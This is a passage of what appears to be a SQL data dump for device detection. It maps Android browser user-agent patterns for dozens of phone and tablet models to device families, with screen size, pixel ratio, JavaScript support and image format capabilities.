Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Trooper_X55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Turbo-X lamda) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Turbo-X_pi) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; U9202L-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; UMI eMAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; URANO 47) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ultra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; UltraSmart 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V1_Viper_I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V1_Viper_I4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V3+) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V370) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V370) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V769M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V8200plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V8200plus) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V865M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; V865M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VF685) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VF695) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VIVO IV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VK810 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VOYAGER2 DG310) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VS810PP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VS840 4G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VS980 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VS985 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VSP355g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vega) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; VergeM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone 785) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone 785) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone 875) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone 890N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone 975N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone 985N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone Smart Tab 3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vodafone','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":540,\"screenHeight\":960,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone Smart Tab 4) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_vodafone','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Vodafone Smart Tab 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_vodafone','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W032i-C3) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W627) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W6500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W6500) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W716) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W716S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W717) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W732) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; W861) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; WAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Wink) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Wise+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X-treme PQ23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X-tremePQ16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X-tremer) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X550U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X9006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X9007) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; X9180) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1022) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1030) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1031) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1033) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1034) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1039) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1045) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1058) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1060) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1063) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1080) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT1097) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT830C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT890) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 